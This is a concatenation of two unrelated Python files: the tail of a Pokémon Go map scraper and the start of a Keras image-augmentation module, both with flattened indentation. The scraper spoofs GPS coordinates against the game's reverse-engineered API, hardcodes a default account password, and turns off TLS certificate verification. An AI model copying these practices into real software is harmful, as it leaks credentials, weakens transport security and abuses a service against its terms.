return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
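# These helpers reinterpret the 64-bit IEEE 754 bit pattern of a double as an
# unsigned integer (and back); they are not numeric casts. For example:
#   f2h(1.0)                  -> '0x3ff0000000000000'
#   h2f('0x3ff0000000000000') -> 1.0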
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
        except (GeocoderTimedOut, GeocoderServiceError) as e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
    prog = re.compile(r'^(-?\d+(\.\d+)?),\s*(-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
sysprint('[!] Your given location: {}'.format(loc.address.encode('utf-8')))
sysprint('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
global global_parent_pid
while True:
if global_parent_pid is not None:
if not is_running(global_parent_pid):
return
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
        except (InvalidURL, ConnectionError, DecodeError) as e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
sysprint('REQUEST:')
sysprint(p_req)
sysprint('Response:')
sysprint(p_ret)
sysprint('''
''')
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
sysprint('[!] Google login for: {}'.format(username))
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
sysprint('[!] PTC login for: {}'.format(username))
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
    except ValueError as e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
sysprint('[!] Trimming password to 15 characters')
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
    except Exception as e:
if DEBUG:
sysprint(r1.json()['errors'][0])
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', default='mrliputo', required=False)
parser.add_argument('-p', '--password', help='Password', default='qwe123qwe', required=False)
parser.add_argument('-t', '--token', help='SSO Token', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=True)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=True)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=1200)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.add_argument(
'-pid', '--parent_pid', help='Parent PID', default=None)
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password and not args.token:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
if args.token:
access_token = args.token
else:
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
sysprint('[+] RPC Session Token: {} ...'.format(access_token[:25]))
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
sysprint('[+] Received API endpoint: {}'.format(api_endpoint))
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
sysprint('[+] Login successful')
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
sysprint('[+] Username: {}'.format(profile.profile.username))
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
sysprint('[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S')))
for curr in profile.profile.currency:
sysprint('[+] {}: {}'.format(curr.type, curr.amount))
return api_endpoint, access_token, profile_response
def main():
me = singleton.SingleInstance('pokemap')
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
sysprint('[!] Invalid Auth service specified')
return
sysprint('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
sysprint('[!] DEBUG mode on')
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
sysprint('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
if args.parent_pid:
global global_parent_pid
global_parent_pid = int(args.parent_pid)
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
if global_parent_pid is not None:
if not is_running(global_parent_pid):
return
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
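        # The (x, y) pair walks an outward square spiral around the start point:
        # each iteration moves one grid cell (0.0025 degrees per unit) and the
        # direction (dx, dy) rotates 90 degrees at the spiral's corners.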
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
sysprint('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
sysprint('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
sysprint('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
                    spawn_id = wild.SpawnPointId
                    if spawn_id not in seen or seen[spawn_id] <= wild.TimeTillHiddenMs:
                        visible.append(wild)
                        seen[spawn_id] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
    for pokemon_key in list(pokemons.keys()):
        pokemon = pokemons[pokemon_key]
        if current_time > pokemon['disappear_time']:
            sysprint("[+] removing stale pokemon %s at %f, %f from list" % (
                pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng']))
            del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
#if not werkzeug.serving.is_running_from_reloader():
# debug(
# 'register_background_thread: not running inside Flask so not starting thread')
# return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
sysprint('[-] Invalid next location: %s,%s' % (lat, lon))
else:
sysprint('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
<div><small>{lat}, {lng}</small></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
pokestop = {
'lat': stop[0],
'lng': stop[1]
}
if stop[2] > 0:
disappear_time = time.mktime(datetime.strptime(time.strftime("%d/%m/%Y") + ' ' + stop[2], "%d/%m/%Y %H:%M:%S").timetuple())
pokestop['expire_time'] = disappear_time
pokestop['expire_time_formatted'] = stop[2]
LABEL_TMPL = u'''
<div><b>Lured Pokestop</b><span></div>
<div>Lure expires at - {expire_time_formatted} <span class='label-countdown' disappears-at='{expire_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
<div><small>{lat}, {lng}</small></div>
'''
label = LABEL_TMPL.format(**pokestop)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': pokestop['lat'],
'lng': pokestop['lng'],
'infobox': label,
})
else:
LABEL_TMPL = u'''
<div><b>Pokestop</b><span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
<div><small>{lat}, {lng}</small></div>
'''
label = LABEL_TMPL.format(**pokestop)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': pokestop['lat'],
'lng': pokestop['lng'],
'infobox': label,
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
def monitor_parent_process():
if args.parent_pid is None:
return
while is_running(int(args.parent_pid)):
time.sleep(1)
sysprint('Parent process shutdown')
func = flask.request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
sys.exit(0)
return
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
if __name__ == '__main__':
args = get_args()
threading.Thread(target=monitor_parent_process).start()
register_background_thread(initial_registration=True)
app.run(debug=False, threaded=True, host=args.host, port=args.port)
|
mutil_processing_image_generator_balance.py
|
"""Fairly basic set of tools for real-time data augmentation on image data.
Can easily be extended to include new transformations,
new preprocessing methods, etc...
"""
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import re
from scipy import linalg
import scipy.ndimage as ndi
from six.moves import range
import os
import threading
import warnings
from os import listdir
import json
import random
import sys
import cv2
import logging
import argparse
from PIL import Image
import glob
import keras
from queue import Queue
import time
import pdb
# from .. import backend as K
import keras.backend as K
try:
from PIL import Image as pil_image
pil_image.MAX_IMAGE_PIXELS = None
except ImportError:
pil_image = None
def extract_foreground_mask(img, threshold=0.75, dilate_kernel=2):
"""
Func: Extract a binary foreground mask from a slide image.
Args: img - BGR image array.
Returns: gray_t - binary mask (0 or 255) of the foreground.
"""
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (dilate_kernel, dilate_kernel))
# Convert color space
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, gray_t = cv2.threshold(gray, threshold * 255, 255, cv2.THRESH_BINARY_INV)
gray_t = cv2.dilate(gray_t, kernel)
ret, gray_t = cv2.threshold(gray_t, threshold * 255, 255, cv2.THRESH_BINARY)
return gray_t
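# Hedged usage sketch (added for illustration; `patch_bgr` and `fg_ratio` are
# hypothetical names, not part of the original module): the mask returned above
# can be used to estimate how much of a BGR patch is tissue vs. white background.
#
#   patch_bgr = cv2.imread('patch.png')                    # assumed BGR input
#   mask = extract_foreground_mask(patch_bgr)               # binary 0/255 mask
#   fg_ratio = np.count_nonzero(mask) / float(mask.size)    # foreground fraction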
def shuffle_list(list_to_be_shuffle, is_shuffle):
"""
Args:
list_to_be_shuffle: The list to shuffle.
is_shuffle: bool; if True the list is shuffled, if False it is returned unchanged.
Returns:
list_to_be_shuffle: The (possibly shuffled) list.
"""
if is_shuffle:
shuffled_index = list(range(len(list_to_be_shuffle)))
# random.seed(12345)
random.shuffle(shuffled_index)
list_to_be_shuffle = [list_to_be_shuffle[i] for i in shuffled_index]
return list_to_be_shuffle
def transform_list_to_array(array_list, shuffle=True):
"""
Func: transform [[image, label], [image, label], ...] into batch_images of shape [batch_size, w, h, c] and batch_labels stacked along the first axis.
Args: array_list - list of [image, label] pairs; shuffle - whether to shuffle before stacking.
Returns: batch_images, batch_labels
"""
assert len(array_list) != 0, 'no patches to extend!'
array_list_shuffle = shuffle_list(array_list, shuffle)
batch_images = np.expand_dims(array_list_shuffle[0][0], axis=0)
batch_labels = np.expand_dims(array_list_shuffle[0][1], axis=0)
for i in range(1, len(array_list_shuffle)):
batch_images = \
np.concatenate((batch_images, np.expand_dims(array_list_shuffle[i][0], axis=0)))
batch_labels = \
np.concatenate((batch_labels, np.expand_dims(array_list_shuffle[i][1], axis=0)))
return batch_images, batch_labels
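# Hedged example (illustrative only; `pairs` is a hypothetical name): with two
# (image, label) pairs of shape (511, 511, 3), the call below yields batch_images
# of shape (2, 511, 511, 3) and batch_labels of shape (2,).
#
#   pairs = [[np.zeros((511, 511, 3)), 0], [np.ones((511, 511, 3)), 1]]
#   batch_images, batch_labels = transform_list_to_array(pairs, shuffle=False)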
def random_rotation(x, rg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random rotation of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
rg: Rotation range, in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Rotated Numpy image tensor.
"""
theta = np.pi / 180 * np.random.uniform(-rg, rg)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_shift(x, wrg, hrg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random spatial shift of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
wrg: Width shift range, as a float fraction of the width.
hrg: Height shift range, as a float fraction of the height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Shifted Numpy image tensor.
"""
h, w = x.shape[row_axis], x.shape[col_axis]
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
translation_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_shear(x, intensity, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random spatial shear of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
intensity: Transformation intensity.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Sheared Numpy image tensor.
"""
shear = np.random.uniform(-intensity, intensity)
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_zoom(x, zoom_range, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random spatial zoom of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
zoom_range: Tuple of floats; zoom range for width and height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Zoomed Numpy image tensor.
# Raises
ValueError: if `zoom_range` isn't a tuple.
"""
if len(zoom_range) != 2:
raise ValueError('zoom_range should be a tuple or list of two floats. '
'Received arg: ', zoom_range)
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_channel_shift(x, intensity, channel_axis=0):
x = np.rollaxis(x, channel_axis, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
def transform_matrix_offset_center(matrix, x, y):
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
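# Hedged note (added for clarity, not in the original): the returned matrix is
# offset_matrix . matrix . reset_matrix, i.e. the transform is applied about the
# image centre (o_x, o_y). Illustrative use with a rotation matrix:
#
#   theta = np.pi / 6
#   rot = np.array([[np.cos(theta), -np.sin(theta), 0],
#                   [np.sin(theta),  np.cos(theta), 0],
#                   [0, 0, 1]])
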